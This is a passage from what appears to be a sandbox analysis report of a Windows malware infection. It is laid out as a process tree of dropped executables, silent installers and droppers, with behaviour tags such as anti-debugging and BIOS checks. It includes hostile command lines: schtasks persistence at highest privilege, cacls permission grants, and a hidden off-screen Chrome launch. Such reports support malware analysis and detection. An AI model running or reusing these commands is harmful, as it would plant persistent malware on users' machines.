                                                                              "C:\Users\Admin\AppData\Local\Temp\f5-91ee7-3f5-352ae-45034c78abf0d\SHywasafave.exe"
                                                                              8⤵
                                                                              • Checks computer location settings
                                                                              PID:5596
                                                                            • C:\Users\Admin\AppData\Local\Temp\44-d784c-fb5-97a9b-fd50b95fbbf35\Lylobuhuma.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\44-d784c-fb5-97a9b-fd50b95fbbf35\Lylobuhuma.exe"
                                                                              8⤵
                                                                                PID:3668
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\te0x5fxl.u5p\GcleanerEU.exe /eufive & exit
                                                                                  9⤵
                                                                                    PID:5296
                                                                                    • C:\Users\Admin\AppData\Local\Temp\te0x5fxl.u5p\GcleanerEU.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\te0x5fxl.u5p\GcleanerEU.exe /eufive
                                                                                      10⤵
                                                                                        PID:7252
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pexd4f42.hcj\installer.exe /qn CAMPAIGN="654" & exit
                                                                                      9⤵
                                                                                        PID:6820
                                                                                        • C:\Users\Admin\AppData\Local\Temp\pexd4f42.hcj\installer.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\pexd4f42.hcj\installer.exe /qn CAMPAIGN="654"
                                                                                          10⤵
                                                                                          • Loads dropped DLL
                                                                                          • Enumerates connected drives
                                                                                          • Modifies system certificate store
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          PID:7268
                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\pexd4f42.hcj\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\pexd4f42.hcj\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635531155 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                            11⤵
                                                                                              PID:4148
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\je2543jg.kqj\any.exe & exit
                                                                                          9⤵
                                                                                            PID:5036
                                                                                            • C:\Users\Admin\AppData\Local\Temp\je2543jg.kqj\any.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\je2543jg.kqj\any.exe
                                                                                              10⤵
                                                                                                PID:7308
                                                                                                • C:\Users\Admin\AppData\Local\Temp\je2543jg.kqj\any.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\je2543jg.kqj\any.exe" -u
                                                                                                  11⤵
                                                                                                    PID:7724
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\alhrrlzu.ogg\gcleaner.exe /mixfive & exit
                                                                                                9⤵
                                                                                                  PID:5860
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\alhrrlzu.ogg\gcleaner.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\alhrrlzu.ogg\gcleaner.exe /mixfive
                                                                                                    10⤵
                                                                                                      PID:7608
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hraey2fo.lul\autosubplayer.exe /S & exit
                                                                                                    9⤵
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:5824
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                          4⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:6048
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                          4⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:6040
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\xElAyeIw50JluSwsSuM4XUkh.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\xElAyeIw50JluSwsSuM4XUkh.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2028
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\_a9bjXZnQasIHtS17xpzAM_A.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\_a9bjXZnQasIHtS17xpzAM_A.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks BIOS information in registry
                                                                                        • Checks whether UAC is enabled
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        PID:1928
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\wkXljDjtJ_soIymeCGnCPUf8.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\wkXljDjtJ_soIymeCGnCPUf8.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2112
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\H5syGgeGjm1QZ7G0GUKO80fU.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\H5syGgeGjm1QZ7G0GUKO80fU.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:2064
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\H5syGgeGjm1QZ7G0GUKO80fU.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\H5syGgeGjm1QZ7G0GUKO80fU.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4648
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\KlXRxT5f_iJEoK1UdGLcjh1L.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\KlXRxT5f_iJEoK1UdGLcjh1L.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks BIOS information in registry
                                                                                        • Checks whether UAC is enabled
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        PID:3992
                                                                                        • C:\Users\Admin\AppData\Roaming\process.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\process.exe"
                                                                                          4⤵
                                                                                          • Drops startup file
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:7000
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd.exe
                                                                                            5⤵
                                                                                              PID:5412
                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                cacls "C:\youch" /C /G Admin:F
                                                                                                6⤵
                                                                                                  PID:6800
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd.exe
                                                                                                5⤵
                                                                                                  PID:5712
                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                    cacls "C:\youch" /C /G Admin:F /T
                                                                                                    6⤵
                                                                                                      PID:8
                                                                                                  • C:\Users\Admin\AppData\Roaming\process.exe
                                                                                                    C:\Users\Admin\AppData\Roaming\process.exe
                                                                                                    5⤵
                                                                                                    • Drops startup file
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:4104
                                                                                                    • C:\youch\youch\youch\youch\gcp\chrome.exe
                                                                                                      C:\youch\youch\youch\youch\gcp\chrome.exe "https://youtu.be/2qpIJL8BOOA" --user-data-dir="1" --mute-audio --window-position="5000,5000" --window-size="2000,2000"
                                                                                                      6⤵
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      PID:5960
                                                                                                      • C:\youch\youch\youch\youch\gcp\chrome.exe
                                                                                                        C:\youch\youch\youch\youch\gcp\chrome.exe --type=crashpad-handler /prefetch:7 --no-rate-limit "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=51.0.2704.106 --handshake-handle=0x298
                                                                                                        7⤵
                                                                                                          PID:7560
                                                                                                        • C:\youch\youch\youch\youch\gcp\chrome.exe
                                                                                                          "C:\youch\youch\youch\youch\gcp\chrome.exe" --type=renderer --enable-features=AutomaticTabDiscarding<AutomaticTabDiscarding,*ExpectCTReporting<ExpectCTReporting,IncidentReportingModuleLoadAnalysis<SafeBrowsingIncidentReportingServiceFeatures,IncidentReportingSuspiciousModuleReporting<SafeBrowsingIncidentReportingServiceFeatures,UpdateRendererPriorityOnStartup<UpdateRendererPriorityOnStartup,UsePasswordSeparatedSigninFlow<PasswordSeparatedSigninFlow,WebFontsIntervention<WebFontsIntervention,*WebRTC-EnableWebRtcEcdsa<WebRTC-EnableWebRtcEcdsa,brotli-encoding<BrotliEncoding --disable-features=RenderingPipelineThrottling<RenderingPipelineThrottling --force-fieldtrials=AppBannerTriggering/Aggressive/*AutomaticTabDiscarding/Enabled_Once_10-gen2/CaptivePortalInterstitial/Enabled/ChildAccountDetection/Disabled/DirectWriteFontProxy/UseDirectWriteFontProxy/EnforceCTForProblematicRoots/disabled/ExpectCTReporting/ExpectCTReportingDisabled/GoogleBrandedContextMenu/default/*NetworkQualityEstimator/Enabled/*OutOfProcessPac/Default/PasswordBranding/SmartLockBrandingSavePromptOnly/*PasswordGeneration/Disabled/PasswordSeparatedSigninFlow/Enabled/ReportCertificateErrors/ShowAndPossiblySend/SHA1IdentityUIWarning/Enabled/SHA1ToolbarUIJanuary2016/Warning/SHA1ToolbarUIJanuary2017/Error/SRTPromptFieldTrial/Off/SSLCommonNameMismatchHandling/Enabled/*SafeBrowsingIncidentReportingServiceFeatures/WithSuspiciousModuleReporting/SafeBrowsingUnverifiedDownloads/DisableByParameterMostSbTypes2/Spellcheck/Default/*TriggeredResetFieldTrial/On/*UMA-Dynamic-Uniformity-Trial/Group3/*UMA-Population-Restrict/normal/WebFontsIntervention/Enabled_Launch/WebRTC-EnableWebRtcEcdsa/Default/ --primordial-pipe-token=91666F2269C48867CC00B7E809ADD58B --lang=en-US --user-data-dir=1 --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --blink-settings=fetchDeferLateScripts=true,fetchIncreaseFontPriority=true,fetchIncreasePriorities=true --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="5960.0.836706600\905261734" --mojo-platform-channel-handle=2208 /prefetch:1
                                                                                                          7⤵
                                                                                                          • Checks computer location settings
                                                                                                          PID:3628
                                                                                                        • C:\youch\youch\youch\youch\gcp\chrome.exe
                                                                                                          "C:\youch\youch\youch\youch\gcp\chrome.exe" --type=renderer --enable-features=AutomaticTabDiscarding<AutomaticTabDiscarding,*ExpectCTReporting<ExpectCTReporting,IncidentReportingModuleLoadAnalysis<SafeBrowsingIncidentReportingServiceFeatures,IncidentReportingSuspiciousModuleReporting<SafeBrowsingIncidentReportingServiceFeatures,UpdateRendererPriorityOnStartup<UpdateRendererPriorityOnStartup,UsePasswordSeparatedSigninFlow<PasswordSeparatedSigninFlow,WebFontsIntervention<WebFontsIntervention,*WebRTC-EnableWebRtcEcdsa<WebRTC-EnableWebRtcEcdsa,brotli-encoding<BrotliEncoding --disable-features=RenderingPipelineThrottling<RenderingPipelineThrottling --force-fieldtrials=AppBannerTriggering/Aggressive/*AutomaticTabDiscarding/Enabled_Once_10-gen2/CaptivePortalInterstitial/Enabled/ChildAccountDetection/Disabled/DirectWriteFontProxy/UseDirectWriteFontProxy/EnforceCTForProblematicRoots/disabled/ExpectCTReporting/ExpectCTReportingDisabled/GoogleBrandedContextMenu/default/*NetworkQualityEstimator/Enabled/*OutOfProcessPac/Default/PasswordBranding/SmartLockBrandingSavePromptOnly/*PasswordGeneration/Disabled/PasswordSeparatedSigninFlow/Enabled/ReportCertificateErrors/ShowAndPossiblySend/SHA1IdentityUIWarning/Enabled/SHA1ToolbarUIJanuary2016/Warning/SHA1ToolbarUIJanuary2017/Error/SRTPromptFieldTrial/Off/SSLCommonNameMismatchHandling/Enabled/*SafeBrowsingIncidentReportingServiceFeatures/WithSuspiciousModuleReporting/SafeBrowsingUnverifiedDownloads/DisableByParameterMostSbTypes2/Spellcheck/Default/*TriggeredResetFieldTrial/On/*UMA-Dynamic-Uniformity-Trial/Group3/*UMA-Population-Restrict/normal/WebFontsIntervention/Enabled_Launch/WebRTC-EnableWebRtcEcdsa/Default/ --primordial-pipe-token=09A5BAE159D9CCF851C85281075E877B --lang=en-US --user-data-dir=1 --extension-process --enable-webrtc-hw-h264-encoding --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --blink-settings=fetchDeferLateScripts=true,fetchIncreaseFontPriority=true,fetchIncreasePriorities=true --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="5960.1.948900715\799814871" --mojo-platform-channel-handle=2704 /prefetch:1
                                                                                                          7⤵
                                                                                                          • Checks computer location settings
                                                                                                          PID:4588
                                                                                                        • C:\youch\youch\youch\youch\gcp\chrome.exe
                                                                                                          "C:\youch\youch\youch\youch\gcp\chrome.exe" --type=renderer --enable-features=AutomaticTabDiscarding<AutomaticTabDiscarding,*ExpectCTReporting<ExpectCTReporting,IncidentReportingModuleLoadAnalysis<SafeBrowsingIncidentReportingServiceFeatures,IncidentReportingSuspiciousModuleReporting<SafeBrowsingIncidentReportingServiceFeatures,UpdateRendererPriorityOnStartup<UpdateRendererPriorityOnStartup,UsePasswordSeparatedSigninFlow<PasswordSeparatedSigninFlow,WebFontsIntervention<WebFontsIntervention,*WebRTC-EnableWebRtcEcdsa<WebRTC-EnableWebRtcEcdsa,brotli-encoding<BrotliEncoding --disable-features=RenderingPipelineThrottling<RenderingPipelineThrottling --force-fieldtrials=AppBannerTriggering/Aggressive/*AutomaticTabDiscarding/Enabled_Once_10-gen2/CaptivePortalInterstitial/Enabled/ChildAccountDetection/Disabled/DirectWriteFontProxy/UseDirectWriteFontProxy/EnforceCTForProblematicRoots/disabled/ExpectCTReporting/ExpectCTReportingDisabled/GoogleBrandedContextMenu/default/*NetworkQualityEstimator/Enabled/*OutOfProcessPac/Default/PasswordBranding/SmartLockBrandingSavePromptOnly/*PasswordGeneration/Disabled/PasswordSeparatedSigninFlow/Enabled/ReportCertificateErrors/ShowAndPossiblySend/SHA1IdentityUIWarning/Enabled/SHA1ToolbarUIJanuary2016/Warning/SHA1ToolbarUIJanuary2017/Error/SRTPromptFieldTrial/Off/SSLCommonNameMismatchHandling/Enabled/*SafeBrowsingIncidentReportingServiceFeatures/WithSuspiciousModuleReporting/SafeBrowsingUnverifiedDownloads/DisableByParameterMostSbTypes2/Spellcheck/Default/*TriggeredResetFieldTrial/On/*UMA-Dynamic-Uniformity-Trial/Group3/*UMA-Population-Restrict/normal/WebFontsIntervention/Enabled_Launch/WebRTC-EnableWebRtcEcdsa/Default/ --primordial-pipe-token=787616B93A2C295911460833E7E453E8 --lang=en-US --user-data-dir=1 --extension-process --enable-webrtc-hw-h264-encoding --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --blink-settings=fetchDeferLateScripts=true,fetchIncreaseFontPriority=true,fetchIncreasePriorities=true --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="5960.2.244940606\1983895198" --mojo-platform-channel-handle=2736 /prefetch:1
                                                                                                          7⤵
                                                                                                          • Checks computer location settings
                                                                                                          PID:5892
                                                                                                        • C:\youch\youch\youch\youch\gcp\chrome.exe
                                                                                                          "C:\youch\youch\youch\youch\gcp\chrome.exe" --type=renderer --enable-features=AutomaticTabDiscarding<AutomaticTabDiscarding,*ExpectCTReporting<ExpectCTReporting,IncidentReportingModuleLoadAnalysis<SafeBrowsingIncidentReportingServiceFeatures,IncidentReportingSuspiciousModuleReporting<SafeBrowsingIncidentReportingServiceFeatures,UpdateRendererPriorityOnStartup<UpdateRendererPriorityOnStartup,UsePasswordSeparatedSigninFlow<PasswordSeparatedSigninFlow,WebFontsIntervention<WebFontsIntervention,*WebRTC-EnableWebRtcEcdsa<WebRTC-EnableWebRtcEcdsa,brotli-encoding<BrotliEncoding --disable-features=RenderingPipelineThrottling<RenderingPipelineThrottling --force-fieldtrials=AppBannerTriggering/Aggressive/*AutomaticTabDiscarding/Enabled_Once_10-gen2/CaptivePortalInterstitial/Enabled/ChildAccountDetection/Disabled/DirectWriteFontProxy/UseDirectWriteFontProxy/EnforceCTForProblematicRoots/disabled/ExpectCTReporting/ExpectCTReportingDisabled/GoogleBrandedContextMenu/default/*NetworkQualityEstimator/Enabled/*OutOfProcessPac/Default/PasswordBranding/SmartLockBrandingSavePromptOnly/*PasswordGeneration/Disabled/PasswordSeparatedSigninFlow/Enabled/ReportCertificateErrors/ShowAndPossiblySend/SHA1IdentityUIWarning/Enabled/SHA1ToolbarUIJanuary2016/Warning/SHA1ToolbarUIJanuary2017/Error/SRTPromptFieldTrial/Off/SSLCommonNameMismatchHandling/Enabled/*SafeBrowsingIncidentReportingServiceFeatures/WithSuspiciousModuleReporting/SafeBrowsingUnverifiedDownloads/DisableByParameterMostSbTypes2/Spellcheck/Default/*TriggeredResetFieldTrial/On/*UMA-Dynamic-Uniformity-Trial/Group3/*UMA-Population-Restrict/normal/WebFontsIntervention/Enabled_Launch/WebRTC-EnableWebRtcEcdsa/Default/ --primordial-pipe-token=70B2F17FEB2C550C18181D2745C38173 --lang=en-US --user-data-dir=1 --extension-process --enable-webrtc-hw-h264-encoding --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --blink-settings=fetchDeferLateScripts=true,fetchIncreaseFontPriority=true,fetchIncreasePriorities=true --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="5960.3.1253427952\313957715" --mojo-platform-channel-handle=2740 /prefetch:1
                                                                                                          7⤵
                                                                                                          • Checks computer location settings
                                                                                                          PID:1368
                                                                                                        • C:\youch\youch\youch\youch\gcp\chrome.exe
                                                                                                          "C:\youch\youch\youch\youch\gcp\chrome.exe" --type=renderer --enable-features=AutomaticTabDiscarding<AutomaticTabDiscarding,*ExpectCTReporting<ExpectCTReporting,IncidentReportingModuleLoadAnalysis<SafeBrowsingIncidentReportingServiceFeatures,IncidentReportingSuspiciousModuleReporting<SafeBrowsingIncidentReportingServiceFeatures,UpdateRendererPriorityOnStartup<UpdateRendererPriorityOnStartup,UsePasswordSeparatedSigninFlow<PasswordSeparatedSigninFlow,WebFontsIntervention<WebFontsIntervention,*WebRTC-EnableWebRtcEcdsa<WebRTC-EnableWebRtcEcdsa,brotli-encoding<BrotliEncoding --disable-features=RenderingPipelineThrottling<RenderingPipelineThrottling --force-fieldtrials=AppBannerTriggering/Aggressive/*AutomaticTabDiscarding/Enabled_Once_10-gen2/CaptivePortalInterstitial/Enabled/ChildAccountDetection/Disabled/DirectWriteFontProxy/UseDirectWriteFontProxy/EnforceCTForProblematicRoots/disabled/ExpectCTReporting/ExpectCTReportingDisabled/GoogleBrandedContextMenu/default/*NetworkQualityEstimator/Enabled/*OutOfProcessPac/Default/PasswordBranding/SmartLockBrandingSavePromptOnly/*PasswordGeneration/Disabled/PasswordSeparatedSigninFlow/Enabled/ReportCertificateErrors/ShowAndPossiblySend/SHA1IdentityUIWarning/Enabled/SHA1ToolbarUIJanuary2016/Warning/SHA1ToolbarUIJanuary2017/Error/SRTPromptFieldTrial/Off/SSLCommonNameMismatchHandling/Enabled/*SafeBrowsingIncidentReportingServiceFeatures/WithSuspiciousModuleReporting/SafeBrowsingUnverifiedDownloads/DisableByParameterMostSbTypes2/Spellcheck/Default/*TriggeredResetFieldTrial/On/*UMA-Dynamic-Uniformity-Trial/Group3/*UMA-Population-Restrict/normal/WebFontsIntervention/Enabled_Launch/WebRTC-EnableWebRtcEcdsa/Default/ --primordial-pipe-token=00E2F8B4E5A0F54B1D7A0FA0F949107A --lang=en-US --user-data-dir=1 --extension-process --enable-webrtc-hw-h264-encoding --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --blink-settings=fetchDeferLateScripts=true,fetchIncreaseFontPriority=true,fetchIncreasePriorities=true --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="5960.4.678051647\500804427" --mojo-platform-channel-handle=2764 /prefetch:1
                                                                                                          7⤵
                                                                                                          • Checks computer location settings
                                                                                                          PID:3160
                                                                                                        • C:\youch\youch\youch\youch\gcp\chrome.exe
                                                                                                          "C:\youch\youch\youch\youch\gcp\chrome.exe" --type=renderer --enable-features=AutomaticTabDiscarding<AutomaticTabDiscarding,*ExpectCTReporting<ExpectCTReporting,IncidentReportingModuleLoadAnalysis<SafeBrowsingIncidentReportingServiceFeatures,IncidentReportingSuspiciousModuleReporting<SafeBrowsingIncidentReportingServiceFeatures,UpdateRendererPriorityOnStartup<UpdateRendererPriorityOnStartup,UsePasswordSeparatedSigninFlow<PasswordSeparatedSigninFlow,WebFontsIntervention<WebFontsIntervention,*WebRTC-EnableWebRtcEcdsa<WebRTC-EnableWebRtcEcdsa,brotli-encoding<BrotliEncoding --disable-features=RenderingPipelineThrottling<RenderingPipelineThrottling --force-fieldtrials=AppBannerTriggering/Aggressive/*AutomaticTabDiscarding/Enabled_Once_10-gen2/CaptivePortalInterstitial/Enabled/ChildAccountDetection/Disabled/DirectWriteFontProxy/UseDirectWriteFontProxy/EnforceCTForProblematicRoots/disabled/ExpectCTReporting/ExpectCTReportingDisabled/GoogleBrandedContextMenu/default/*NetworkQualityEstimator/Enabled/*OutOfProcessPac/Default/PasswordBranding/SmartLockBrandingSavePromptOnly/*PasswordGeneration/Disabled/PasswordSeparatedSigninFlow/Enabled/ReportCertificateErrors/ShowAndPossiblySend/SHA1IdentityUIWarning/Enabled/SHA1ToolbarUIJanuary2016/Warning/SHA1ToolbarUIJanuary2017/Error/SRTPromptFieldTrial/Off/SSLCommonNameMismatchHandling/Enabled/*SafeBrowsingIncidentReportingServiceFeatures/WithSuspiciousModuleReporting/SafeBrowsingUnverifiedDownloads/DisableByParameterMostSbTypes2/Spellcheck/Default/*TriggeredResetFieldTrial/On/*UMA-Dynamic-Uniformity-Trial/Group3/*UMA-Population-Restrict/normal/WebFontsIntervention/Enabled_Launch/WebRTC-EnableWebRtcEcdsa/Default/ --primordial-pipe-token=A56128744BC407B27D4F620471C94949 --lang=en-US --user-data-dir=1 --extension-process --enable-webrtc-hw-h264-encoding --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --blink-settings=fetchDeferLateScripts=true,fetchIncreaseFontPriority=true,fetchIncreasePriorities=true --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="5960.5.797692388\280382592" --mojo-platform-channel-handle=2784 /prefetch:1
                                                                                                          7⤵
                                                                                                          • Checks computer location settings
                                                                                                          PID:2460
                                                                                                        • C:\youch\youch\youch\youch\gcp\chrome.exe
                                                                                                          "C:\youch\youch\youch\youch\gcp\chrome.exe" --type=utility --channel="5960.6.51701753\1607950326" --lang=en-US --user-data-dir=1 --mojo-platform-channel-handle=3360 --ignored=" --type=renderer " /prefetch:8
                                                                                                          7⤵
                                                                                                            PID:5056
                                                                                                          • C:\youch\youch\youch\youch\gcp\chrome.exe
                                                                                                            "C:\youch\youch\youch\youch\gcp\chrome.exe" --type=utility --channel="5960.7.640925547\780260012" --lang=en-US --user-data-dir=1 --mojo-platform-channel-handle=4188 --ignored=" --type=renderer " /prefetch:8
                                                                                                            7⤵
                                                                                                              PID:4796
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\cli.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\cli.exe"
                                                                                                        4⤵
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                        PID:836
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\PnzRIclxxHMTaIlbXqD1UbTl.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\PnzRIclxxHMTaIlbXqD1UbTl.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:1856
                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                        4⤵
                                                                                                          PID:3024
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 488
                                                                                                          4⤵
                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                          • Program crash
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4164
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\v6vj6Y2HzZYjFFZrlhOGO9zz.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\v6vj6Y2HzZYjFFZrlhOGO9zz.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:1736
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\kncW9GbLZVCPKURS3ScBc7Cc.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\kncW9GbLZVCPKURS3ScBc7Cc.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:2088
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\PyamHjGIJs4JGv0wqE9cMswe.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\PyamHjGIJs4JGv0wqE9cMswe.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:2260
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\bgh5H7EP_d1aZ8plCFrR79_B.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\bgh5H7EP_d1aZ8plCFrR79_B.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:1516
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 680
                                                                                                          4⤵
                                                                                                          • Program crash
                                                                                                          PID:4204
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 664
                                                                                                          4⤵
                                                                                                          • Program crash
                                                                                                          PID:1040
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 648
                                                                                                          4⤵
                                                                                                          • Program crash
                                                                                                          PID:5412
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 704
                                                                                                          4⤵
                                                                                                          • Program crash
                                                                                                          PID:5632
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\D_EBN1jht8Qh2IIqhzJXiNjW.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\D_EBN1jht8Qh2IIqhzJXiNjW.exe"
                                                                                                        3⤵
                                                                                                          PID:1532
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4720
